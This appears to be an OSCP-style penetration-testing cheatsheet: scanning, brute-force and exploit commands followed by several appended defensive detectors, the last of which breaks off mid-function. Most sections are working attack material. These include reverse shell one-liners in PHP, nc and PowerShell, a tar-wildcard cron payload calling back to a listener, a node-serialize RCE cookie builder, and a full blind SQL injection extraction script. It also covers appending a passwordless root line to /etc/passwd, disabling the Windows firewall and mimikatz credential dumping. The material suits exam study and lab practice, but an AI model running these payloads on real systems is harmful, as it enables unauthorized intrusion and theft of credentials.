###### tags: `oscp`

# OSCP Cheatsheet

## Port Enumeration

### AutoRecon

https://github.com/Tib3rius/AutoRecon

```
sudo autorecon <ip>
```

### Nmap

#### Scan hosts

```
nmap -sn 192.168.56.1-255
```

#### Initial scan of the top 1000 ports with service info and default scripts

```
nmap --top-ports=1000 -v -sV -sC -Pn 10.2.2.23 --open
```

#### Full scan

```
nmap -p- -v -sV -sC -Pn 10.2.2.23 --open
```

#### UDP scan

## TCP Service Enumeration

### FTP (21)

#### Anonymous login

Log in with the username `anonymous` and an empty password.

#### FTP connect using username and password

```
ftp -n ip port_number
ftp> user username
331 Password required for username
Password:
```

#### FTP list directory

```
ftp> ls
```

#### FTP download file

- **single file**

```
ftp> get filename
```

- **multiple files**

```
ftp> mget filename1 filename2 ...
```

### SSH (22)

#### OpenSSH 4.3p2 Debian 9 (protocol 2.0)

https://github.com/CptGibbon/CVE-2021-3156

### SMTP (25)

#### shellshock

https://github.com/3mrgnc3/pentest_old/blob/master/postfix-shellshock-nc.py

### HTTP (80)

#### Web vulnerability scan

```
nikto -h url
nmap --script http-vuln-* -p 80 <ip>
```

#### Scan web directory

```
dirb <url>
dirsearch -u <url> -w <dictionary_path> -t 8
# dirsearch for specific extensions
dirsearch -u <url> -w <dictionary_path> -t 8 -e php,html -f
```

#### Check robots.txt

#### Weak credentials

```
admin:admin
```

#### Shellshock (php < 5.6.2)

https://www.exploit-db.com/exploits/35146

#### Use hydra to bruteforce username

- `log`: the POST parameter that carries the username
- `F=`: consider an attempt a failure if the response contains the given text

```
hydra -L <username_list> -p <password> <ip> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
```

#### Use hydra to bruteforce password

```
hydra -l <username> -P <password_list> <ip> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
```

#### Bypass image file upload limitation

1. Append `GIF89a;` at the beginning of the reverse shell
2. Use a double extension with gif

#### nodejs express cookie unserialization

```
for p in $(msfvenom -p nodejs/shell_reverse_tcp lhost=192.168.56.102 lport=443 -f raw 2>/dev/null | grep -o .|sed 's/.*/x&x/'); do if [ "$p" == "x" ]; then echo -n "32,"; else printf "%d," "'${p:1:1}" ; fi; done | sed 's/.*/{"rce":"_$$ND_FUNC$$_function (){ eval(String.fromCharCode(&32))}()"}/' | base64 -w0
```

#### SQL injection

- **Useful payloads**

```
home' AND 1=1 AND 'dog'='dog
-7417\')/**/OR/**/7305=7305/**/AND/**/(\'TKQo\'/**/LIKE/**/\'TKQo
```

- **Time-based injection script**

:::spoiler python script
```python=
import requests
import time

#SELECT 8232 FROM (SELECT(SLEEP(5)))UXlp
def sendpost(payload):
    headers = {'User-Agent': payload,'Content-Type':'application/x-www-form-urlencoded'}
    datas = 'user=dog&pass=dog'
    http_proxy = "http://192.168.56.102:31337"
    proxyDict = { "http": http_proxy }
    start_time = time.time()
    r = requests.post('http://pinkys-palace:8080/littlesecrets-main/login.php',data=datas,headers=headers,proxies=proxyDict)
    return time.time() - start_time

# database() length 12
'''
for i in range(1,20):
    payload = f"123' AND (IF(length(database())={i},sleep(5),1)=1) AND 'mSPZ'='mSPZ"
    start_time = time.time()
    sendpost(payload)
    if time.time() - start_time > 1.0:
        print(i)
        break
'''

# database() = pinky_sec_db
'''
database = ""
index = 0
for i in range(12,13):
    print(i)
    low = 0
    high = 122
    mid = 0
    while low <= high:
        mid = (low + high) // 2
        print(mid)
        payload = f"123' AND (IF(ascii(mid((database()),{i},1))={mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ"
        if sendpost(payload) > 0.5:
            break
        payload = f"123' AND (IF(ascii(mid((database()),{i},1))>{mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ"
        if sendpost(payload) > 0.5:
            low = mid + 1
        else:
            high = mid - 1
    database += chr(mid)
    print(database)
'''

# table 0 logs
# table 1 users
'''
table = ""
index = 1
for i in range(1,7):
    print(i)
    low = 0
    high = 122
    mid = 0
    while low <= high:
        mid = (low + high) // 2
        print(mid)
        payload = f"123' AND (IF(ascii(mid((select table_name from information_schema.tables where table_schema='pinky_sec_db' limit {index},1), {i}, 1))={mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ"
        if sendpost(payload) > 0.5:
            break
        payload = f"123' AND (IF(ascii(mid((select table_name from information_schema.tables where table_schema='pinky_sec_db' limit {index},1), {i}, 1))>{mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ"
        if sendpost(payload) > 0.5:
            low = mid + 1
        else:
            high = mid - 1
    table += chr(mid)
    print(table)
'''

# column 0 uid
# column 1 user
# column 2 pass
'''
column = ""
index = 2
for i in range(1,8):
    print(i)
    low = 0
    high = 122
    mid = 0
    while low <= high:
        mid = (low + high) // 2
        print(mid)
        payload = f"123' AND (IF(ascii(mid((select column_name from information_schema.columns where table_name='users' limit {index},1), {i}, 1))={mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ"
        if sendpost(payload) > 0.5:
            break
        payload = f"123' AND (IF(ascii(mid((select column_name from information_schema.columns where table_name='users' limit {index},1), {i}, 1))>{mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ"
        if sendpost(payload) > 0.5:
            low = mid + 1
        else:
            high = mid - 1
    column += chr(mid)
    print(column)
'''

# user 0 pinky
# user 1 pinkymanage
'''
user = ""
index = 1
for i in range(10,13):
    print(i)
    low = 0
    high = 122
    mid = 0
    while low <= high:
        mid = (low + high) // 2
        print(mid)
        payload = f"123' AND (IF(ascii(mid((select user from users limit {index},1), {i}, 1))={mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ"
        if sendpost(payload) > 0.5:
            break
        payload = f"123' AND (IF(ascii(mid((select user from users limit {index},1), {i}, 1))>{mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ"
        if sendpost(payload) > 0.5:
            low = mid + 1
        else:
            high = mid - 1
    user += chr(mid)
    print(user)
'''

# pass 0 f543dbfeaf238729831a321c7a68bee4
# pass 1 d60dffed7cc0d87e1f4a11aa06ca73af
'''
password = ""
index = 0
for i in range(1,34):
    print(i)
    low = 0
    high = 122
    mid = 0
    while low <= high:
        mid = (low + high) // 2
        print(mid)
        payload = f"123' AND (IF(ascii(mid((select pass from users limit {index},1), {i}, 1))={mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ"
        if sendpost(payload) > 0.5:
            break
        payload = f"123' AND (IF(ascii(mid((select pass from users limit {index},1), {i}, 1))>{mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ"
        if sendpost(payload) > 0.5:
            low = mid + 1
        else:
            high = mid - 1
    password += chr(mid)
    print(password)
'''
```
:::

#### Wordpress

- **Wordpress reverse shell upload**: replace 404.php with the reverse shell, then access 404.php (Appearance -> Editor -> 404.php)
- **wpscan scan**

```
wpscan --url <url> --enumerate ap,at,cb,dbe
```

- **Use wpscan to enumerate usernames**

```
wpscan --url <url> --enumerate u
```

- **Use wpscan to crack passwords**

```
wpscan --url <url> --passwords <passwordlist> --usernames <username>
```

- **Use hydra to crack passwords**

```
hydra -l username -P passwordlist ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:S=Location'
```

### SMB (139,445)

#### Find vulnerabilities in SMB

```
nmap --script smb-vuln* -p 139,445 $ip
```

#### ms08-067 script

https://github.com/andyacer/ms08_067

#### ms17-010 script

https://www.exploit-db.com/exploits/42315

metasploit: windows/smb/ms17_010_psexec

#### Open SMB server

```
sudo python3 smbserver.py ROPNOP <dir>
```

#### Open SMBv2 server

```
sudo python3 smbserver.py -smb2support -username john -password john ROPNOP <dir>
```

#### Download file from SMBv2 server

```
net use x: \\192.168.119.131\ROPNOP /user:john john
# disconnect from share
net use x: /d
```

#### Check SMB version

Change tap0 to the correct interface.

```
#!/bin/sh
#Author: rewardone
#Description:
#    Requires root or enough permissions to use tcpdump
#    Will listen for the first 7 packets of a null login
#    and grab the SMB Version
#Notes:
#    Will sometimes not capture or will print multiple
#    lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```

#### Samba < 2.2.8 (Linux/BSD)

https://www.exploit-db.com/exploits/10

#### Samba 3.4.5

https://www.exploit-db.com/exploits/33599

#### Samba 3.5.0 < 4.4.14/4.5.10/4.6.4

https://www.exploit-db.com/exploits/42084

### MSSQL (1433)

#### master.mdf location

```
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Binn\Templates\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Template Data\master.mdf
# DOS 8.3 filenames
/PROGRA~1/MICROS~1/MSSQL14.SQLEXPRESS/MSSQL/TEMPLA~1/master.mdf
/PROGRA~1/MICROS~1/MSSQL1~1.SQL/MSSQL/Binn/Templates/master.mdf
/PROGRA~1/MICROS~1/MSSQL14.SQLEXPRESS/MSSQL/Backup/master.mdf
```

#### Get-MDFHashes

Extracts hashes from master.mdf. pwsh can run the script.

https://github.com/xpn/Powershell-PostExploitation/tree/master/Invoke-MDFHashes

#### xp_cmdshell

```
-- this turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
-- quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
```

### NFS (2049)

#### nmap script to showmount

```
nmap -p111 --script=nfs-showmount <ip>
```

#### showmount to list exposed NFS shares

```
showmount -e <ip>
```

#### mount NFS to a local directory

```
sudo mount -t nfs -o vers=3 <ip>:<target_directory> <your_directory>
```

#### mount NFS via nfspy without creating a new uid and gid

```
sudo nfspy -o server=<ip>:<target_directory>,hide,allow_other,rw,intr <your_directory>
```

#### show directory owner

```
ls -ld <directory>
```

#### umount directory

```
sudo fusermount -u <directory>
```

### MySQL (3306)

#### local login with password

```
mysql -u root -p
```

#### remote login with password

```
mysql -u root -p -h ip
```

#### view all databases

```
show databases;
```

#### use a specific database

```
use database_name;
```

#### MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)

https://www.exploit-db.com/exploits/1518

### RDP (3389)

#### login

```
rdesktop -d <domain> -u <username> -p <password> <ip> -5 -K -r clipboard:CLIPBOARD
```

## UDP Service Enumeration

### TFTP (69)

#### connect

```
tftp <ip> <port>
```

#### commands

```
connect: connect to the remote tftp server
mode: file transfer mode
put: upload a file
get: download a file
quit: exit
verbose: show detailed processing information
trace: show the packet path
status: show current status information
binary: binary transfer mode
ascii: ascii transfer mode
rexmt: set the packet transmission timeout
timeout: set the retransmission timeout
```

## File Transfer

### nc send file in Windows

```
type result | .\nc64.exe -w 3 <ip> <port>
```

### curl

```
curl -O http://192.168.0.101/file.txt
```

### python http server

```
sudo python3 -m http.server 8080
```

## Port Forwarding

### SSH

```
ssh -f -N -D 9050 <user>@<ip>
```

### Proxychains

Multiple proxies can be listed in /etc/proxychains.conf

```
socks5 127.0.0.1 9050
```

## Reverse shell

### php

Complete reverse shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Simple reverse shell

```php=
<?php $sock=fsockopen("192.168.56.1",8888);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
```

```
php -r '$sock=fsockopen("ip",5566);exec("/bin/sh -i <&3 >&3 2>&3");'
```

### nc

```
nc -e /bin/sh <ip> <port>
```

### listen for the reverse shell

```
nc -nlvp port
```

### spawning a tty shell

```
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
```

### cleanup double characters

```
stty raw -echo
```

### Word macro

- Make the payload using msfvenom

```
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f vba-psh
```

- Put the payload in ThisDocument

![](https://s3.us-west-2.amazonaws.com/secure.notion-static.com/217a8fd9-c151-48c6-82c2-af625b8d6855/Untitled.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAT73L2G45O3KS52Y5%2F20211009%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20211009T135828Z&X-Amz-Expires=86400&X-Amz-Signature=494259cb89c0a8e80ad25b968c10870c0c8e658e9e836cfb96d32681c5efa415&X-Amz-SignedHeaders=host&response-content-disposition=filename%20%3D%22Untitled.png%22)

- Close the antivirus to save the file

### powershell

```
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

### msfvenom

#### windows x86 exe

```
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
```

#### hta

```
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f hta-psh > shell.hta
```

## Hash cracking

### password hash type identification

```
hash-identifier
```

### md5 hash lookup

http://www.md5decrypt.org/

### linux password hashes

sha512 with salt

```
hashcat -m 1800 test.txt -o cracked.txt /usr/share/wordlists/rockyou.txt
```

phpass (starts with `$P$`)

```
hashcat -m 400 test.txt -o cracked.txt /usr/share/wordlists/rockyou.txt
```

## Linux Privilege Escalation

### check sudo privileges

```
sudo -l
```

### privilege escalation enumeration script

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

### binaries with SUID set

https://gtfobins.github.io/

### impersonate binary file

1. Compile a file that spawns a shell, such as

   ```c=
   #include <stdio.h>
   #include <stdlib.h>

   int main(){
       system("/bin/sh");
       return 0;
   }
   ```

2. `chmod 777 file`
3. Add the directory to PATH

   ```
   export PATH="/directory:$PATH"
   ```

### crontab tar wildcard injection

1. A crontab such as

   ```
   */1 * * * * root /etc/cron.daily/backup

   bob@linsecurity:~$ cat /etc/cron.daily/backup
   #!/bin/bash
   for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done
   ```

2. Create three files

   ```
   echo "mkfifo /tmp/knbzq; nc 192.168.56.1 8888 0</tmp/knbzq | /bin/sh >/tmp/knbzq 2>&1; rm /tmp/knbzq" > shell.sh && chmod +x shell.sh
   echo "" > "--checkpoint-action=exec=sh shell.sh"
   echo "" > --checkpoint=1
   ```

3. Use an nc listener to receive the reverse shell

   ```
   $ nc -lvp 8888
   ```

### hash in /etc/passwd

1. Use hash-identifier to identify the hash type
2. Use hashcat to crack it
3. su to that user

### find useful files in the web directory

### find file with a specific name

```
find / -name filename 2>/dev/null
```

### writable /etc/passwd

```
echo "root::0:0:root:/root:/bin/bash" >> /etc/passwd
tail -n +2 /etc/passwd > /tmp/bak_up
cat /tmp/bak_up > /etc/passwd
su
```

### sudo version <= 1.8.31

https://github.com/CptGibbon/CVE-2021-3156

### Linux Kernel 2.6.22 < 3.9 Dirty Cow

https://www.exploit-db.com/exploits/40839

### Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)

https://www.exploit-db.com/exploits/45010

## Windows Privilege Escalation

### privilege escalation enumeration script

#### Winpeasx64.exe

#### PrivescCheck.ps1

```
Set-ExecutionPolicy Bypass -Scope process -Force
. .\PrivescCheck.ps1; Invoke-PrivescCheck
```

### Windows add administrator user

```
net user john john /add
net localgroup Administrators john /add
```

### JuicyPotato

Does not work on Windows Server 2019 and Windows 10 versions 1809 and higher.

Affected versions

```
Windows 7 Enterprise
Windows 8.1 Enterprise
Windows 10 Enterprise
Windows 10 Professional
Windows Server 2008 R2 Enterprise
Windows Server 2012 Datacenter
Windows Server 2016 Standard
```

https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato

### Windows XP SP0/SP1

https://sohvaxus.github.io/content/winxp-sp1-privesc.html

### Writable service exe

Replace the exe with a reverse shell, then restart the machine.

### Microsoft Windows 10 Build 1803 < 1903 COMahawk

https://www.exploit-db.com/exploits/47684

### Check service running privilege

```
sc.exe qc <service_name>
```

### Extract user hashes from SAM.OLD and SYSTEM.OLD

```
samdump2 -d -o password SYSTEM.OLD SAM.OLD
```

## Other ways to get a shell

### copy ssh public key into authorized_keys, then ssh without a password

```
cp ~/.ssh/id_rsa.pub vulnix/.ssh/authorized_keys
```

### when ssh is filtered and there is a proxy service

1. Add the proxy information to /etc/proxychains.conf
2. ssh through proxychains (`-t` for a tty shell and `/bin/sh` for the command; both can be omitted)

   ```
   proxychains ssh -t john@192.168.56.101 /bin/sh
   ```

### ssh with key file

```
$ ssh -i id_rsa pinky@192.168.56.102 -p 64666
```

## BOF

### test buffer length

```python=
import socket

victim = '127.0.0.1'
port = 9999

# 1000 "A" bytes; bytes (not str) so this runs under Python 3
junk = b"\x41" * 1000
payload = junk

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connect to victim")
s.connect((victim, port))
s.recv(1024)
print("Send payload")
s.send(payload)
print("Done")
```

### create pattern to check EIP offset

```
msf-pattern_create -l <length>
```

### check EIP value in Immunity Debugger

### check pattern offset

```
msf-pattern_offset -l <length> -q <offset>
```

### find ROP gadget

#### ROPgadget

```
ROPgadget --binary <binary> | grep 'jmp esp'
```

#### Immunity Debugger

```
!mona find -s "\xff\xe4" -m "<binary or dll>"
```

### Check bad chars

```
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
```

### generate reverse shell payload

#### windows

```
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -e x86/shikata_ga_nai -f python -b '\x00<other bad chars>'
```

#### linux

```
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -e x86/shikata_ga_nai -f python -b '\x00<other bad chars>'
```

### set breakpoint

Press F2

### single step

Press F7

### final payload

```
"A" * <pattern_offset> + <jmp esp address> + "B" * <offset_to_esp> + "\x90"*10 + <shellcode>
```

### use objdump to view assembly

```
objdump -M intel -d filename
```

## Linux tricks

### Escape restricted shell

```
python -c 'import pty;pty.spawn("/bin/sh")'
```

### fcrackzip

- `-v`: verbose
- `-u`: use unzip to check whether the password is correct
- `-D`: use a dictionary
- `-p`: use string as initial password/file; I don't quite understand this, but it doesn't crack without it XD

```
fcrackzip -v -u -D -p passwordlist zipfilename
```

### image forensics

#### exiftool

```
exiftool imagename
```

## Windows tricks

### Close firewall

```
NetSh Advfirewall set allprofiles state off
```

### Check firewall rules

```
netsh advfirewall firewall show rule name=all dir=out type=dynamic
```

### mimikatz

#### list all available provider credentials

```
privilege::debug
sekurlsa::logonpasswords
```

### Login with hash

#### pth-winexe

#### evil-winrm

```
evil-winrm -i <ip> -u <user> -p <password>
evil-winrm -i <ip> -u <user> --hash <nt_hash>
```

## smtp

### user enumeration

```
./smtp-user-enum.pl -M VRFY -U ../unix_users.txt -t 192.168.56.105
```

## finger

### user enumeration

```
./finger-user-enum.pl -U ../unix_users.txt -t 192.168.56.105
```

## knockd

When the server detects a specific sequence of port hits, it runs a command defined in its configuration file.

```
sudo knock ip port_sequence
```

## Kerberoasting

### video

https://www.youtube.com/watch?v=beRDcvBwTBw

### script

https://github.com/nidem/kerberoast
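## Added example: spotting time-based SQL injection probes in web logs

The time-based injection script under "HTTP (80) / SQL injection" smuggles `sleep()` conditions through the User-Agent header and measures the response delay. The same traffic is easy to see from the server side. The detector below is an added example written for this cheatsheet, not code from the original page; it assumes Apache-style combined log lines with the request duration in microseconds (`%D`) appended as a last field, and the log lines are constructed samples: one carries the page's `length(database())`/`sleep(5)` probe in the User-Agent, one a URL-encoded, `/**/`-padded variant in the query string.

```python
import re
from urllib.parse import unquote

# Constructed sample log (assumed format: combined log + %D microseconds).
SAMPLE_LOG = """192.0.2.10 - - [10/Oct/2021:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0" 120000
192.0.2.10 - - [10/Oct/2021:12:00:02 +0000] "POST /littlesecrets-main/login.php HTTP/1.1" 200 512 "-" "123' AND (IF(length(database())=12,sleep(5),1)=1) AND 'mSPZ'='mSPZ" 5004000
192.0.2.10 - - [10/Oct/2021:12:00:08 +0000] "GET /littlesecrets-main/login.php?user=1%27/**/AND/**/SLEEP(5)/**/AND/**/%27a%27=%27a HTTP/1.1" 200 512 "-" "Mozilla/5.0" 5002000
192.0.2.20 - - [10/Oct/2021:12:00:09 +0000] "GET /report.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0" 3100000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<us>\d+)$'
)

# Functions whose only purpose in a query is to stall it.
TIME_SQLI_RE = re.compile(
    r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE
)


def normalize(value):
    """Undo the two cheapest evasions: URL-encoding and /**/ comment padding."""
    value = unquote(value)
    value = re.sub(r"/\*.*?\*/", " ", value)
    return " ".join(value.split())


def flag_time_based_sqli(log_text, slow_ms=2000):
    """Return one finding per log line whose path, UA or referer carries a stall function."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        ms = int(m.group("us")) // 1000
        for field in ("path", "ua", "referer"):
            if TIME_SQLI_RE.search(normalize(m.group(field))):
                findings.append({
                    "line": lineno,
                    "ip": m.group("ip"),
                    "field": field,
                    "ms": ms,
                    # a stalled response corroborates that the injected sleep ran
                    "slow": ms >= slow_ms,
                })
                break
    return findings


if __name__ == "__main__":
    for finding in flag_time_based_sqli(SAMPLE_LOG):
        print(finding)
```

The slow `/report.php` request is deliberately not flagged: latency alone is noisy, so the rule keys on the stall function and reports the latency as corroboration. Logging the User-Agent and request duration is what makes this detection possible; the fix on the application side is parameterized queries, which this script does not replace.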
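## Added example: checking a cookie for node-serialize function payloads

The one-liner under "nodejs express cookie unserialization" builds a base64 cookie whose `rce` value starts with `_$$ND_FUNC$$_` and ends in `()`, the marker node-serialize turns back into an immediately invoked function. The checker below is an added example, not code from the original page; the cookies it inspects are constructed samples, and the function names are this example's own.

```python
import base64
import binascii
import json

# Marker node-serialize uses to flag a string as a serialized function.
ND_FUNC_MARKER = "_$$ND_FUNC$$_"

# Constructed samples: the shape produced by the cheatsheet's one-liner, and a
# harmless session object.
SUSPICIOUS_COOKIE = base64.b64encode(
    b'{"rce":"_$$ND_FUNC$$_function (){ eval(String.fromCharCode(1,2,3))}()"}'
).decode()
BENIGN_COOKIE = base64.b64encode(b'{"username":"alice","role":"user"}').decode()


def decode_profile_cookie(cookie):
    """Base64-decode and JSON-parse a cookie; return None on anything malformed."""
    padded = cookie + "=" * (-len(cookie) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(padded, validate=True)
        return json.loads(raw.decode("utf-8"))
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def _walk_strings(obj):
    """Yield every string value in a nested JSON structure."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from _walk_strings(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from _walk_strings(value)


def find_serialized_functions(cookie):
    """Return the strings that node-serialize would revive as functions."""
    obj = decode_profile_cookie(cookie)
    if obj is None:
        return []
    hits = []
    for s in _walk_strings(obj):
        if s.startswith(ND_FUNC_MARKER):
            body = s[len(ND_FUNC_MARKER):]
            # a trailing "()" means the function runs during unserialize itself
            hits.append({"body": body, "iife": body.rstrip().endswith("()")})
    return hits


if __name__ == "__main__":
    print(find_serialized_functions(SUSPICIOUS_COOKIE))
    print(find_serialized_functions(BENIGN_COOKIE))
```

The mitigation is not to filter the marker but to stop using node-serialize on attacker-controlled input: plain `JSON.parse` cannot produce functions, and a signed cookie stops tampering before parsing.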
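## Added example: auditing cron scripts for tar wildcard injection

The "crontab tar wildcard injection" steps work because `tar ... *` lets a file named `--checkpoint-action=...` be parsed as an option. The audit below is an added example, not code from the original page; it reads shell script text (the page's backup script is embedded as a constructed sample, alongside hardened variants) and reports every `tar` invocation whose file list contains a bare glob that is not protected by a preceding `--`.

```python
import re
import shlex

# Constructed samples: the cron job and backup script quoted in the cheatsheet,
# plus three hardened spellings of the same backup.
SAMPLE_CRON = "*/1 * * * * root /etc/cron.daily/backup\n"
SAMPLE_BACKUP_SCRIPT = """#!/bin/bash
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done
"""
HARDENED_SCRIPT = """#!/bin/bash
cd /home/alice && /bin/tar -zcf /etc/backups/home-alice.tgz -- *
cd /home/bob && /bin/tar -zcf /etc/backups/home-bob.tgz ./*
cd /home/carol && /bin/tar -zcf /etc/backups/home-carol.tgz .
"""

# Split a shell line into simple commands at ; && || |
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")


def _is_bare_glob(arg):
    """A glob the shell may expand to a name that starts with '-'."""
    return bool(arg) and arg[0] in "*?["


def find_wildcard_tar(script_text):
    """Return (line_number, command, glob) for each injectable tar invocation."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for segment in SEPARATORS.split(line):
            try:
                tokens = shlex.split(segment)
            except ValueError:  # unbalanced quotes: fall back to whitespace split
                tokens = segment.split()
            if not tokens or tokens[0].rsplit("/", 1)[-1] != "tar":
                continue
            args = tokens[1:]
            if "--" in args:
                # only arguments before '--' can ever be parsed as options
                args = args[: args.index("--")]
            for arg in args:
                if _is_bare_glob(arg):
                    findings.append((lineno, segment, arg))
    return findings


if __name__ == "__main__":
    for lineno, command, glob in find_wildcard_tar(SAMPLE_BACKUP_SCRIPT):
        print(f"line {lineno}: '{command}' expands {glob!r} in a user-writable directory")
```

Crontab schedule fields are full of `*` but never appear after the `tar` token, so they are not flagged. Any of the three hardened forms closes the hole: `-- *` stops option parsing, `./*` makes every expanded name start with `./`, and archiving `.` avoids the glob entirely; the root-owned job writing into a directory other users control is the underlying mistake.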
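## Added example: auditing /etc/passwd for the tricks above

Both "hash in /etc/passwd" and "writable /etc/passwd" rely on the password file itself: a hash left in the second field instead of `x`, or an appended `root::0:0:...` line whose empty field means no password at all. The audit below is an added example, not code from the original page; it takes the file's text (a constructed sample that ends with the page's appended root line) and its permission bits as inputs so it runs offline, and reports empty password fields, hashes stored outside /etc/shadow, non-root uid 0 accounts, duplicate names and a group/world-writable mode.

```python
import stat

# Constructed /etc/passwd content: three ordinary entries plus the
# "root::0:0:root:/root:/bin/bash" line the cheatsheet appends.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bob:x:1000:1000:bob:/home/bob:/bin/bash
root::0:0:root:/root:/bin/bash
"""


def audit_passwd(text, mode=0o644):
    """Return (line, code, detail) findings for a passwd file's content and mode."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
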